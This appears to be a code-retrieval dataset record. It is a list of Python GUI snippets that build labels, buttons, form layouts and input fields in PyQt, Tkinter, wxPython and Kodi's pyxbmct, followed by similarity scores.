self.form_layout.setLabelAlignment(\n QtCore.Qt.AlignRight | QtCore.Qt.AlignTrailing | QtCore.Qt.AlignVCenter\n )\n\n # store roles\n label_role = QtWidgets.QFormLayout.LabelRole\n field_role = QtWidgets.QFormLayout.FieldRole\n\n self.main_layout.addLayout(self.form_layout)\n\n i = -1\n\n # Reviewer\n i += 1\n reviewer_name_label = QtWidgets.QLabel(self)\n reviewer_name_label.setText(\"Reviewer\")\n 
self.form_layout.setWidget(i, label_role, reviewer_name_label)\n\n self.reviewer_name_widget = QtWidgets.QLabel(self)\n self.form_layout.setWidget(i, field_role, self.reviewer_name_widget)\n\n # Task Name field\n i += 1\n task_name_label = QtWidgets.QLabel(self)\n task_name_label.setText(\"Task\")\n self.form_layout.setWidget(i, label_role, task_name_label)\n\n self.task_name_widget = QtWidgets.QLabel(self)\n self.form_layout.setWidget(i, field_role, self.task_name_widget)\n\n # # Version Info field\n # from anima.ui.widgets.version import VersionDetailsWidget\n # self.latest_version_widget = VersionDetailsWidget(parent=self)\n # self.main_layout.insertWidget(0, self.latest_version_widget)\n\n # Review Type Field\n i += 1\n review_type_label = QtWidgets.QLabel(self)\n review_type_label.setText(\"Review Type\")\n self.form_layout.setWidget(i, label_role, review_type_label)\n\n self.review_type_widget = ReviewTypeWidget(self)\n self.review_type_widget.currentIndexChanged.connect(\n partial(self.review_type_changed_callback)\n )\n\n self.form_layout.setWidget(i, field_role, self.review_type_widget)\n\n # Timing Field\n i += 1\n effort_label = QtWidgets.QLabel(self)\n effort_label.setText(\"Timing\")\n self.form_layout.setWidget(i, label_role, effort_label)\n\n effort_layout = QtWidgets.QHBoxLayout()\n self.form_layout.setLayout(i, field_role, effort_layout)\n\n from anima.ui.widgets.timing import ScheduleTimingWidget\n from anima import defaults\n\n self.timing_widget = ScheduleTimingWidget(\n self, timing_resolution=defaults.timing_resolution\n )\n self.timing_widget.setEnabled(False)\n # set the default to 1 hour\n self.timing_widget.set_schedule_info(timing=1, unit=\"h\")\n effort_layout.addWidget(self.timing_widget)\n\n # Description Field\n i += 1\n description_label = QtWidgets.QLabel(self)\n description_label.setText(\"Description\")\n self.form_layout.setWidget(i, label_role, description_label)\n\n self.description_widget = QtWidgets.QTextEdit(self)\n self.form_layout.setWidget(i, field_role, self.description_widget)", "def create_widgets(self):", "def set_ui(self):\r\n\r\n self.canvas = tk.Canvas(self)\r\n self.canvas.pack()\r\n\r\n self.entry = ttk.Entry(self.canvas, justify=\"center\", font=(\"Calibri\", 12))\r\n\r\n self.grid = Grid(self.canvas)", "def __init__(self, text, separator_line_thickness, label_type, dpi=(600, 600)):\n \n def get_text_on_label(text, label_type):\n \"\"\"Format how the text will look on the label.\n \n text - Text to be placed on the label.\n label_type - One of the types specifying the label layout.\n \"\"\"\n text_on_label = \"\".join([c for c in text if c in string.ascii_letters + string.digits])\n if label_type == 0:\n text_on_label = \"\"\n elif label_type == 1 or label_type == 2 or label_type == 4:\n text_on_label = \"\\n\".join([text_on_label[:4],\n text_on_label[4:8],\n text_on_label[8:12],\n text_on_label[12:]])\n elif label_type == 3:\n text_on_label = \"\\n\".join([\"-\".join([text_on_label[:4],\n text_on_label[4:8]]),\n \"-\".join([text_on_label[8:12],\n text_on_label[12:]])])\n else:\n text_on_label = \"\"\n return text_on_label\n \n self.label_image = None\n self.text_on_label = get_text_on_label(text, label_type)\n self.label_type = label_type\n self.separator_line_thickness = separator_line_thickness\n self.dpi = dpi", "def __init__(\r\n self, text=\"Ok\", font=None, size=30, state: int = Button.INACTIVE\r\n ) -> None:\r\n super().__init__(state)\r\n self._font = Font(font, size)\r\n self._text = text\r\n self.rect = Rect(0, 0, 0, 0)\r\n 
self.redraw()", "def InitUI(self, frame):\n\t\timport wx\n\t\tframe.SetSize((200,210))\n\t\t\n\t\tpanel = wx.Panel(frame)\n\t\t\n\t\tvbox = wx.BoxSizer(wx.VERTICAL)\n\t\t\n\t\thbox1 = wx.BoxSizer(wx.HORIZONTAL)\n\t\tstartButton = wx.Button(panel, label='Start Baselining', size=(170, 25))\n\t\thbox1.Add(startButton)\n\t\tvbox.Add(hbox1, flag=wx.LEFT | wx.RIGHT | wx.ALIGN_CENTRE, border=5)\n\t\t\n\t\tvbox.Add((-1, 5))\n\t\t\n\t\thbox2 = wx.BoxSizer(wx.HORIZONTAL)\n\t\tstopButton = wx.Button(panel, label='Stop Baselining', size=(170, 25))\n\t\thbox2.Add(stopButton)\n\t\tvbox.Add(hbox2, flag=wx.LEFT | wx.RIGHT | wx.ALIGN_CENTRE, border=5)\n\t\t\n\t\tvbox.Add((-1, 5))\n\t\t\n\t\thbox6 = wx.BoxSizer(wx.HORIZONTAL)\n\t\tresetButton = wx.Button(panel, label='Reset', size=(170, 25))\n\t\thbox6.Add(resetButton)\n\t\tvbox.Add(hbox6, flag=wx.LEFT | wx.RIGHT | wx.ALIGN_CENTRE, border=5)\n\t\t\n\t\tvbox.Add((-1, 10))\n\t\t\n\t\thbox3 = wx.BoxSizer(wx.HORIZONTAL)\n\t\tself.onOffText = wx.StaticText(panel, label='Off')\n\t\thbox3.Add(self.onOffText)\n\t\tvbox.Add(hbox3, flag=wx.LEFT | wx.RIGHT | wx.ALIGN_CENTRE, border=5)\n\t\t\n\t\tvbox.Add((-1, 20))\n\t\t\n\t\thbox4 = wx.BoxSizer(wx.HORIZONTAL)\n\t\tminText = wx.StaticText(panel, label='Min', style=wx.ALIGN_CENTRE)\n\t\tmaxText = wx.StaticText(panel, label='Max', style=wx.ALIGN_CENTRE)\n\t\thbox4.Add(minText, -1)\n\t\thbox4.Add(maxText, -1)\n\t\tvbox.Add(hbox4, flag=wx.EXPAND | wx.LEFT | wx.RIGHT, border=5)\n\t\t\n\t\tvbox.Add((-1, 5))\n\t\t\n\t\thbox5 = wx.BoxSizer(wx.HORIZONTAL)\n\t\tself.minBox = wx.TextCtrl(panel, style=wx.TE_READONLY)\n\t\tself.maxBox = wx.TextCtrl(panel, style=wx.TE_READONLY)\n\t\tself.minBox.SetBackgroundColour((210,210,210))\n\t\tself.maxBox.SetBackgroundColour((210,210,210))\n\t\thbox5.Add(self.minBox, -1, wx.EXPAND)\n\t\thbox5.Add(self.maxBox, -1, wx.EXPAND)\n\t\tvbox.Add(hbox5, flag=wx.LEFT | wx.RIGHT | wx.EXPAND, border=5)\n\t\t\n\t\tpanel.SetSizer(vbox)\n\t\t\n\t\t# Bind items\n\t\tframe.Bind(wx.EVT_BUTTON, self.OnStartPress, id=startButton.GetId())\n\t\tframe.Bind(wx.EVT_BUTTON, self.OnStopPress, id=stopButton.GetId())\n\t\tframe.Bind(wx.EVT_BUTTON, self.OnResetPress, id=resetButton.GetId())", "def createLabels(self):\r\n # Grid layout to organize the widgets\r\n self.grid = QGridLayout()\r\n self.labelWidgets = {\r\n\r\n \"<h2>FECHA</h2>\": (0, 0),\r\n \"<h2>BILL AREA</h2>\": (0, 3, 1, 1),\r\n \"<h2>HORA</h2>\": (1, 0),\r\n \"<h2>NOMBRE</h2>\": (2, 0),\r\n \"<h2>CUMPLEAÑOS</h2>\": (3, 0),\r\n \"<h2>CELULAR</h2>\": (4, 0),\r\n \"<h2>DIRECCIÓN</h2>\": (5, 0),\r\n \"<h2>CIUDAD</h2>\": (6, 0),\r\n \"<h2>MÉTODO DE PAGO</h2>\": (7, 0),\r\n \"<h2>PEDIDO</h2>\": (8, 0, 1, 3),\r\n \"<h2>TOTAL POLLO</h2>\": (9, 0),\r\n \"<h2>TOTAL CARNE</h2>\": (10, 0),\r\n \"<h2>EMPANACHOS</h2>\": (11, 0),\r\n \"<h2>TOTAL PRODUCTOS</h2>\": (12, 0),\r\n \"<h2>VALOR ($)</h2>\": (13, 0)\r\n }\r\n for labelName, position in self.labelWidgets.items():\r\n if len(position) == 4:\r\n self.label = QLabel(labelName)\r\n self.label.setAlignment(Qt.AlignCenter)\r\n self.label.setStyleSheet(\"\"\"\r\n color: #cac03f; font-family: times;\r\n font-weight: bold;\r\n border: 5px inset #cac03f;\r\n font-size: 15px;\r\n \"\"\")\r\n self.grid.addWidget(\r\n self.label, position[0], position[1], position[2], position[3])\r\n\r\n else:\r\n self.label = QLabel(labelName)\r\n self.label.setStyleSheet(\"\"\"\r\n color: #A8DBC5;\r\n font-family: times;\r\n font-weight: bold;\"\"\")\r\n self.grid.addWidget(self.label, position[0], position[1])\r\n # CREATING THE SPECIAL 
BILL LABEL\r\n self.bill = QTextEdit()\r\n self.bill.setFixedWidth(320)\r\n self.bill.setStyleSheet(\"\"\"\r\n font-family: times;\r\n font-size: large;\r\n background-color : white;\r\n border: 4px solid #A8DBC5;\r\n font-size: 15px;\r\n \"\"\")\r\n self.grid.addWidget(self.bill, 1, 3, 12, 1)\r\n # setting the main layout in order to add the logo at the top\r\n # and the labels, line Edit widgets and buttons at the bottom\r\n self.mainLayout = QVBoxLayout()\r\n # Creating the Image Label for the Business logo\r\n self.labelImg = QLabel()\r\n self.labelImg.setAlignment(Qt.AlignCenter)\r\n self.pixmap = QPixmap('kafflogo.png')\r\n self.labelImg.setPixmap(self.pixmap)\r\n # Setting the vertical layout as the main Layout of the tab 1\r\n self.tab1.setLayout(self.mainLayout)\r\n self.mainLayout.addWidget(self.labelImg)\r\n # Adding the grid layout under the image\r\n self.mainLayout.addLayout(self.grid)", "def add_label(self, text, location=(None,0)):\n label=QtWidgets.QLabel(self)\n label.setText(str(text))\n label.setAlignment(QtCore.Qt.AlignLeft)\n location=self._normalize_location(location)\n self.formLayout.addWidget(label,*location)\n return label", "def set_controls(self):\n # Image control\n image = pyxbmct.Image(addonfolder+artsfolder+'/tvh.png')\n self.placeControl(image, 0, 0, rowspan=8, columnspan=16)\n\n\t\t# Label information\n image = pyxbmct.Image(addonfolder+artsfolder+'/users.png')\n self.placeControl(image, 8, 1, rowspan=1, columnspan=14)\n\t\t\n\t\t# Username input\n image = pyxbmct.Image(addonfolder+artsfolder+'/username.png')\n self.placeControl(image, 10, 1, rowspan=1, columnspan=3)\n self.username_input = pyxbmct.Edit('')\n self.placeControl(self.username_input, 10, 4, rowspan=1, columnspan=4)\n\n\t\t# Password input\n image = pyxbmct.Image(addonfolder+artsfolder+'/password.png')\n self.placeControl(image, 11, 1, rowspan=1, columnspan=3)\n self.password_input = pyxbmct.Edit('', isPassword=True)\n self.placeControl(self.password_input, 11, 4, rowspan=1, columnspan=4)\n\n\t\t# Next button\n self.next_button = pyxbmct.Button('Next')\n self.placeControl(self.next_button, 13, 14, rowspan=1, columnspan=1)\n # Connect close button\n self.connect(self.next_button, lambda: self.page())\n\t\t\n\t\t# Close button\n self.close_button = pyxbmct.Button('Exit')\n self.placeControl(self.close_button, 13, 15, rowspan=1, columnspan=1)\n self.connect(self.close_button, lambda: self.closepage())", "def add_text_label(self, name, value=None, label=None, location=(None,0)):\n widget=widget_label.LVTextLabel(self,value=value)\n widget.setObjectName(_fromUtf8(self.name+\"_\"+name))\n return self.add_simple_widget(name,widget,label=label,add_indicator=False,location=location)", "def __init__(self, transform, size, label, loc,\n pad=0.1, borderpad=0.1, sep=2, prop=None, frameon=True):\n self.size_bar = AuxTransformBox(transform)\n self.size_bar.add_artist(Rectangle((0, 0), size, 0, fc='none', color='white', lw=3))\n\n self.txt_label = TextArea(label, dict(color='white', size='x-large', weight='normal'),\n minimumdescent=False)\n\n self._box = VPacker(children=[self.size_bar, self.txt_label],\n align=\"center\",\n pad=0, sep=sep)\n\n AnchoredOffsetbox.__init__(self, loc, pad=pad, borderpad=borderpad,\n child=self._box,\n prop=prop,\n frameon=frameon)", "def fromControls(self,widget):", "def getWidget(self):", "def create_widgets( self ):", "def create_gen_labels(master: Widget) -> None:\r\n\r\n gen_label = Label(master, text='Gen:', font=self.FONT_NORMAL, bg=self.MAIN_BG)\r\n 
gen_label.pack(side=LEFT)\r\n self.gen_number = Label(master, text=0, font=self.FONT_NORMAL, bg=self.MAIN_BG)\r\n self.gen_number.pack(side=LEFT)", "def create_widgets(self):\n # only ever shown card in player's hand, so create widgets when dealt\n self.name_label = tk.Label(self, text=self.name)\n self.ability_label = tk.Label(self, text=self.ability)\n self.food_label = tk.Label(self, text=\"Food: \" + str(self.food))\n self.use_button = TraitUseButton(self, text=\"USE\", command=self.use)", "def makeInstructionLabel(self, textInstruction):\n Label(self.sideFrame, text=textInstruction,\n font=self.sideFont, anchor='w').pack(fill=X, padx=10)", "def _create_signal_label(self, master, row, column, signame, minimum, maximum, unit):\n lbl_name = Label(master, text=signame, bg=COLUMN_COLOR_LIST[column], font=(\"Helvetica\", 12))\n lbl_min = Label(master, text=minimum, bg=COLUMN_COLOR_LIST[column], font=(\"Helvetica\", 9))\n lbl_max = Label(master, text=maximum, bg=COLUMN_COLOR_LIST[column + 1], font=(\"Helvetica\", 9))\n lbl_unit = Label(master, text=unit, bg=COLUMN_COLOR_LIST[column + 2], font=(\"Helvetica\", 9))\n lbl_name.grid(row=row, column=column, columnspan=3, sticky=W+E)\n lbl_min.grid(row=row+1, column=column, sticky=W+E)\n lbl_max.grid(row=row+1, column=column+1, sticky=W+E)\n lbl_unit.grid(row=row+1, column=column+2, sticky=W+E)", "def __repr__(self):\n self.makeLabel() # update the label in case it's changed.\n return self.label", "def set_controls(self):\n # Image control\n image = pyxbmct.Image(addonfolder+artsfolder+'/osc.png')\n self.placeControl(image, 0, 0, rowspan=7, columnspan=16)\n\n\t\t# Label information\n image = pyxbmct.Image(addonfolder+artsfolder+'/readers.png')\n self.placeControl(image, 7, 1, rowspan=1, columnspan=14)\n\t\t\n\t\t# Hostname input\n image = pyxbmct.Image(addonfolder+artsfolder+'/hostname.png')\n self.placeControl(image, 9, 0, rowspan=1, columnspan=4)\n self.hostname_input = pyxbmct.Edit('')\n self.placeControl(self.hostname_input, 9, 4, rowspan=1, columnspan=5)\n\n\t\t# Port input\n image = pyxbmct.Image(addonfolder+artsfolder+'/port.png')\n self.placeControl(image, 12, 1, rowspan=1, columnspan=3)\n self.port_input = pyxbmct.Edit('')\n self.placeControl(self.port_input, 12, 4, rowspan=1, columnspan=2)\n\n\t\t# Username input\n image = pyxbmct.Image(addonfolder+artsfolder+'/username.png')\n self.placeControl(image, 10, 1, rowspan=1, columnspan=3)\n self.username_input = pyxbmct.Edit('')\n self.placeControl(self.username_input, 10, 4, rowspan=1, columnspan=4)\n\t\t\n\t\t# Password input\n image = pyxbmct.Image(addonfolder+artsfolder+'/password.png')\n self.placeControl(image, 11, 1, rowspan=1, columnspan=3)\n self.password_input = pyxbmct.Edit('', isPassword=True)\n self.placeControl(self.password_input, 11, 4, rowspan=1, columnspan=4)\n\n\t\t# Close button\n self.close_button = pyxbmct.Button('Exit')\n self.placeControl(self.close_button, 13, 15, rowspan=1, columnspan=1)\n self.connect(self.close_button, lambda: self.page(Readers))", "def __init__(self, name, header, desc=None, prop=None, style=None, attr=None,\n disabled=False, css_cls=None):\n Widget.__init__(self, name, desc=desc, prop=prop, style=style, attr=attr,\n css_cls=css_cls)\n self._header = header\n self._disabled = disabled", "def pack(self, label, *widgets, **kwargs):\n col = 0\n border = kwargs.get(\"border\", 10)\n font = self.GetFont()\n if \"size\" in kwargs:\n font.SetPointSize(kwargs[\"size\"])\n if kwargs.get(\"bold\", False):\n font.SetWeight(wx.BOLD)\n\n if label != \"\":\n 
text = wx.StaticText(self, label=label)\n text.SetFont(font)\n if \"textcol\" in kwargs:\n text.SetForegroundColour(kwargs[\"textcol\"])\n if not widgets:\n span = (1, 2)\n else:\n span = (1, 1)\n self.sizer.Add(text, pos=(self.row, col), border=border, flag=wx.ALIGN_CENTRE_VERTICAL | wx.LEFT, span=span)\n col += 1\n else:\n text = None\n\n for w in widgets:\n span = (1, 1)\n w.label = text\n if hasattr(w, \"span\"):\n span = (1, w.span)\n w.SetFont(font)\n w.Enable(col == 0 or kwargs.get(\"enable\", True))\n self.sizer.Add(w, pos=(self.row, col), border=border, flag=wx.ALIGN_CENTRE_VERTICAL | wx.EXPAND | wx.LEFT, span=span)\n col += span[1]\n self.row += 1", "def setLabel( self, cCtrlName, cLabel ):\n self.setControlModelProperty( cCtrlName, \"Label\", cLabel )", "def create_widgets(self):\n self.instruction = Label(self, text=\"Enter the password \")\n self.instruction.grid(row=0, column=0, columnspan=2, sticky=W)\n\n self.password_entry = Entry(self)\n self.password_entry.grid(row=0, column=1, sticky=W)\n\n self.submit_button = Button(self, text=\"Submit\",\n command=self.reveal, width=10)\n self.submit_button.grid(row=2, column=0, sticky=W)\n\n self.exit_button = Button(self, text=\"Exit\",\n command=self.quit, width=10)\n self.exit_button.grid(row=2, column=1, sticky=W)\n\n #self.close_button = Button(self, text = \"Close\", command = self.quit)\n #self.close_button.grid(row = 2, column = 0, sticky = E)\n\n self.text = Text(self, width=35, height=5, wrap=WORD)\n self.text.grid(row=3, column=0, columnspan=2, sticky=W)", "def create_title(self):\n label_title = Label(self.frame, text=\"Brick Breaker\", font=(\"Arial\", 40), bg='light blue',\n fg='white')\n label_title.pack()", "def __init__(self, label: str):\n pass", "def create_widgets(self):\n for name in self.names:\n new_label = Label(text=name, id=name, font_size=50)\n self.root.ids.name_entries.add_widget(new_label)", "def init_infobox(self):\n infobox = tk.Label(self, text=\"\", justify=\"left\")\n infobox.grid(row=0, column=1, sticky=\"n\")\n self.infobox = infobox", "def create_base(self):\n if self.debug:\n print(\"Creating base\")\n self.console_panel = ConsolePanel(self.root)\n self.side_panel = SidePanel(self.root, self.populate_main_panel)\n self.side_panel.set_separator(\"word_word\")\n self.main_panel = MainPanel(self.root, action=\"word_word\")", "def create_labels(self):\n for name in self.names:\n new_label = Label(text=name)\n self.root.ids.names_box.add_widget(new_label)", "def create_widget(parent, control_name, control_value, trait,\n label_class=None, user_data=None):\n # Create the list widget: a frame\n frame = QtGui.QFrame(parent=parent)\n frame.setFrameShape(QtGui.QFrame.StyledPanel)\n\n # Create tools to interact with the list widget: expand or collapse -\n # add a list item - remove a list item\n tool_widget = QtGui.QWidget(parent)\n layout = QtGui.QHBoxLayout()\n layout.addStretch(1)\n layout.setContentsMargins(0, 0, 0, 0)\n layout.setSpacing(2)\n tool_widget.setLayout(layout)\n # Create the tool buttons\n resize_button = QtGui.QToolButton()\n layout.addWidget(resize_button)\n # Set the tool icons\n icon = QtGui.QIcon()\n icon.addPixmap(QtGui.QPixmap(\n _fromUtf8(\":/soma_widgets_icons/nav_down\")),\n QtGui.QIcon.Normal, QtGui.QIcon.Off)\n resize_button.setIcon(icon)\n resize_button.setFixedSize(30, 22)\n frame.user_data = user_data\n\n editable_labels = False\n handler = getattr(trait, 'handler', trait)\n if handler.inner_traits():\n editable_labels = True\n frame.inner_trait = 
trait.handler.inner_traits()[0]\n\n add_button = QtGui.QToolButton()\n delete_button = QtGui.QToolButton()\n layout.addWidget(add_button)\n # Set the tool icons\n icon = QtGui.QIcon()\n icon.addPixmap(\n QtGui.QPixmap(_fromUtf8(\":/soma_widgets_icons/add\")),\n QtGui.QIcon.Normal, QtGui.QIcon.Off)\n add_button.setIcon(icon)\n add_button.setFixedSize(30, 22)\n delete_button.setFixedSize(30, 22)\n # Add list item callback\n add_hook = partial(\n ControllerControlWidget.add_item, weak_proxy(parent),\n control_name, weak_proxy(frame))\n add_button.clicked.connect(add_hook)\n\n # Create the associated controller widget\n controller_widget = ControllerWidget(control_value, parent=frame,\n live=True,\n editable_labels=editable_labels,\n user_data=user_data)\n\n # Store some parameters in the list widget\n frame.trait = trait\n frame.controller = control_value\n frame.controller_widget = controller_widget\n frame.connected = False\n\n # Add the list controller widget to the list widget\n frame.setLayout(controller_widget.layout())\n\n # Set some callback on the controller control tools\n # Resize callback\n resize_hook = partial(\n ControllerControlWidget.expand_or_collapse, weak_proxy(frame),\n weak_proxy(resize_button))\n resize_button.clicked.connect(resize_hook)\n\n if getattr(trait, 'expanded') is False:\n ControllerControlWidget.set_expanded(frame, resize_button, False)\n\n # Create the label associated with the controller widget\n control_label = trait.label\n if control_label is None:\n control_label = control_name\n if label_class is None:\n label_class = QtGui.QLabel\n if control_label is not None:\n label = label_class(control_label, parent)\n else:\n label = None\n\n return (frame, (label, tool_widget))", "def __init__(self):\n\n self.boxes = [\n urwid.AttrMap(urwid.Text('QMap'), 'menu header'),\n urwid.Divider('=')\n ]\n\n self.widget = urwid.Padding(None, align='center')\n self.update()\n\n BaseTimedWidgetWrap.__init__(self, self.widget)", "def __init__(self,name,*args,**kargs):\n QtGui.QWidget.__init__(self,*args)\n layout = QtGui.QHBoxLayout()\n #layout.setSpacing(0)\n layout.setMargin(0)\n self.setLayout(layout)\n self.key = str(name)\n if 'text' in kargs:\n text = kargs['text']\n else:\n text = self.key\n if text:\n self.label = QtGui.QLabel()\n text = standardIcon(text)\n if isinstance(text,QtGui.QPixmap):\n self.label.setPixmap(text)\n else:\n self.label.setText(text)\n if 'b' in kargs.get('stretch',''):\n layout.addStretch()\n layout.addWidget(self.label)\n if 'a' in kargs.get('stretch',''):\n print 'test'\n layout.addStretch()\n\n if 'data' in kargs:\n self.data = kargs['data']\n\n if 'enabled' in kargs:\n self.setEnabled(kargs['enabled'])\n\n if 'readonly' in kargs:\n try:\n self.input.setReadOnly(kargs['readonly'])\n except:\n print \"Can not set readonly: %s,%s\" % (name,kargs)\n\n if 'width' in kargs:\n try:\n print 'SETTING WIDTH',self.input\n self.input.setMinimumWidth(kargs['width'])\n except:\n pass\n \n if 'tooltip' in kargs:\n self.setToolTip(kargs['tooltip'])\n ## if hasattr(self,'label'):\n ## self.label.setToolTip(kargs['tooltip'])\n ## try:\n ## self.input.setToolTip(kargs['tooltip'])\n ## except:\n ## pass\n\n if 'buttons' in kargs and kargs['buttons']:\n #print kargs\n self.buttons = dialogButtons(self,kargs['buttons'])\n layout.addItem(self.buttons)", "def create_widgets(self):\n Label(self, text=\"Choose your favorite movie type\").grid(row=0, column=0, sticky=W)\n\n # instructions\n Label(self, text=\"Select all that apply:\").grid(row=1, column=0, 
sticky=W)\n\n # comedy check button\n self.comedy = BooleanVar()\n Checkbutton(self, text=\"Comedy\", variable=self.comedy, command=self.update_text).grid(row=2, column=0, sticky=W)\n\n # drama check button\n self.drama = BooleanVar()\n Checkbutton(self, text=\"Drama\", variable=self.drama, command=self.update_text).grid(row=3, column=0, sticky=W)\n\n # romance check button\n self.romance = BooleanVar()\n Checkbutton(self, text=\"Romance\", variable=self.romance, command=self.update_text).grid(row=4, column=0, sticky=W)\n\n self.result = Text(self, width=40, height=5, wrap=WORD) # wrap=WORD when dropping 1 line down the words will not cut in the middle, drop line prior or after word end\n self.result.grid(row=5, column=0, columnspan=3)", "def __init__(self, gui, shapes, x, y, callback=None, label=None,\r\n label_pos='left', shortcut=None):\r\n if not (type(shapes) is list or type(shapes) is tuple):\r\n self.shapes = [shapes]\r\n else:\r\n self.shapes = shapes\r\n self.toggle = len(self.shapes) > 1 #this widget can toggle between two\r\n self.clicked = False\r\n self.callback = callback\r\n self.shortcut = shortcut\r\n self.label_pos = label_pos\r\n if label:\r\n self.labelobj = pi3d.String(font=gui.font, string=label, is_3d=False,\r\n camera=gui.camera, justify='L')\r\n self.labelobj.set_shader(gui.shader)\r\n else:\r\n self.labelobj = None\r\n self.relocate(x, y)\r\n if not (self in gui.widgets): #because TextBox re-runs Widget.__init__\r\n gui.widgets.append(self)\r\n self.visible = True", "def widget(self, p_int): # real signature unknown; restored from __doc__\n pass", "def widget(self, p_int): # real signature unknown; restored from __doc__\n pass", "def getControls(self):", "def TCFieldWidget(field, request):\n widget = FieldWidget(field, TCWidget(request))\n # widget.label = u'' # don't show the label twice\n return widget", "def _build_gui(self):\n box = qt.QHBoxLayout(self)\n box.addWidget(self._but)\n\n lab = self._lab\n Pol = qt.QSizePolicy\n lab.setSizePolicy(Pol.Expanding, Pol.Preferred)\n lab.setFrameStyle(qt.QLabel.Panel)\n box.addWidget(lab)", "def _build_gui(self):\n box = qt.QHBoxLayout(self)\n box.addWidget(self._but)\n\n lab = self._lab\n Pol = qt.QSizePolicy\n lab.setSizePolicy(Pol.Expanding, Pol.Preferred)\n lab.setFrameStyle(qt.QLabel.Panel)\n box.addWidget(lab)", "def __init__(self,name,value,*args,**kargs):\n \n kargs['text'] = '' # Force no label\n self.input = value\n InputItem.__init__(self,name,*args,**kargs)\n self.layout().insertWidget(1,self.input)", "def __init__(self):\n self.defaultTheme = \"DarkAmber\"\n self.version = 1.4\n self.versionName = \"class update\"\n self.title = \"Lms GUI default window\"\n self.layout = [[sg.Text(\"This is the base window class layout.\")]]\n self.elementJustification = 'c'\n self.location=(500, 300)\n self.running = True\n self.window = None\n self.event = \"\"\n self.values = []\n self.nextAction = None", "def makeTitle(self):\n l1=Label(self.app, text=\"Asset Allocation Combinations\")\n l1.grid(row=0, column=0)", "def __init__(self, x, y, parent, game, app, *args, **kwargs):\n Label.__init__(self, parent, *args, **kwargs)\n self.configure(bg=Color.MID_TONE)\n\n # Helper to create mouse-event listeners for tiles, so they don't\n # trigger when game has ended.\n def create_marker_listener(func):\n def listener(_event):\n if game.get_state() is GameState.PLAYING:\n func(_event)\n\n return listener\n\n # Highlight tile when mouse is over it\n def mouse_over(_event):\n if game.get_tile(x, y) is MarkerType.NONE:\n 
self.configure(bg=Color.HIGH_TONE)\n\n # Return back to normal when mouse off\n def mouse_leave(_event):\n self.configure(bg=Color.MID_TONE)\n\n self.bind(\"<Enter>\", create_marker_listener(mouse_over))\n self.bind(\"<Leave>\", create_marker_listener(mouse_leave))\n self.bind(\"<Button-1>\", create_marker_listener(\n lambda _e: app.grid_clicked(x, y)))\n self.bind(\"<ButtonRelease-1>\",\n create_marker_listener(mouse_leave))", "def buildmainframe(self):\n self.mainframewidgets=[]\n for x in range(3):\n thislabel = Label(self.mainframe, text=str(x))\n thislabel.grid()\n self.mainframewidgets.append(thislabel)", "def __init__(self, dotNumber, isRaised=False):\n\n Gtk.Alignment.__init__(self)\n if dotNumber in [1, 2, 3, 7]:\n self.set(1.0, 0.5, 0.0, 0.0)\n self.set_padding(0, 0, 3, 0)\n else:\n self.set(0.0, 0.5, 0.0, 0.0)\n self.set_padding(0, 0, 0, 3)\n\n self.label = Gtk.Label()\n self.add(self.label)\n if isRaised:\n self.raiseDot()\n else:\n self.lowerDot()", "def create_widgets(self):\r\n\r\n # we pass self since 'self' is a ttk frame\r\n # the tic tac toe buttons\r\n self.btn_tl = ttk.Button(self)\r\n self.btn_tm = ttk.Button(self)\r\n self.btn_tr = ttk.Button(self)\r\n self.btn_ml = ttk.Button(self)\r\n self.btn_mm = ttk.Button(self)\r\n self.btn_mr = ttk.Button(self)\r\n self.btn_bl = ttk.Button(self)\r\n self.btn_bm = ttk.Button(self)\r\n self.btn_br = ttk.Button(self)\r\n\r\n # the reset button\r\n self.btn_reset = ttk.Button(self)" ]
[ "0.68835676", "0.66542274", "0.63613844", "0.6344261", "0.63232493", "0.630243", "0.6290771", "0.61542106", "0.6145763", "0.6128528", "0.60839635", "0.60793793", "0.6052032", "0.60399705", "0.60251766", "0.6019413", "0.5956044", "0.59486943", "0.5947741", "0.5929713", "0.592145", "0.59027714", "0.5897525", "0.58900255", "0.5885295", "0.58769643", "0.5871108", "0.5863109", "0.58589906", "0.5858728", "0.5858443", "0.5853256", "0.58291", "0.58266807", "0.5817648", "0.5778226", "0.5695481", "0.5694086", "0.5693424", "0.5693087", "0.56831545", "0.5679762", "0.5672391", "0.56670046", "0.5660985", "0.5657537", "0.5648342", "0.5645032", "0.56372285", "0.56364197", "0.5634726", "0.56341195", "0.5606234", "0.5590015", "0.55875874", "0.5585702", "0.55826604", "0.5578148", "0.557277", "0.5563365", "0.55500185", "0.55492276", "0.5540989", "0.55287045", "0.5524254", "0.55202866", "0.5519667", "0.55154884", "0.5503924", "0.55005586", "0.54928833", "0.5487588", "0.54811376", "0.5474216", "0.54681647", "0.54602295", "0.54589826", "0.5445203", "0.5443228", "0.5431134", "0.54264784", "0.5423422", "0.54200536", "0.5418309", "0.5411461", "0.5411225", "0.54037434", "0.5378702", "0.5378702", "0.5366552", "0.53653085", "0.5365219", "0.5365219", "0.5359049", "0.5358661", "0.5353649", "0.53518176", "0.5350866", "0.53450125", "0.5341609" ]
0.60125613
16
Fit the model, then return its performance on the test set
def score(self, archi:ArchitectureNN): archi.fit_model(self.train_data, **self.train_params) return archi.compute_test_score(self.test_data)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def fit_test(self):", "def experiment_models(train, test, train_target, test_target):\n # Linear models\n linear_models = [(LinearRegression, {\"n_jobs\": -1}),\n (Lasso, {\"alpha\": 3}),\n (Ridge, {\"alpha\": 3}),\n (LinearSVR, {\"random_state\": 0, \"tol\": 1e-5})]\n\n # Add polynomial features\n poly = preprocessing.PolynomialFeatures(2)\n\n # scaler\n scaler = preprocessing.StandardScaler().fit(train)\n\n print(\"Use linear models with linear features\")\n for model_ in linear_models:\n scaled_train = scaler.transform(train)\n scaled_test = scaler.transform(test)\n model = model_[0](**model_[1])\n model.fit(scaled_train, train_target.to_numpy())\n train_pred = model.predict(scaled_train)\n valid_pred = model.predict(scaled_test)\n print(\"=========================================\")\n print(f\"Model : {model_}\")\n compute_metrics(train_pred, train_target, valid_pred, test_target)\n print(\"=========================================\")\n\n print(\"Use linear models with polynomial features\")\n train = poly.fit_transform(train)\n test = poly.transform(test)\n scaler = preprocessing.StandardScaler().fit(train)\n for model_ in linear_models:\n scaled_train = scaler.transform(train)\n scaled_test = scaler.transform(test)\n model = model_[0](**model_[1])\n model.fit(scaled_train, train_target.to_numpy())\n train_pred = model.predict(scaled_train)\n valid_pred = model.predict(scaled_test)\n print(\"=========================================\")\n print(f\"Model : {model_}\")\n compute_metrics(train_pred, train_target, valid_pred, test_target)\n print(\"=========================================\")", "def 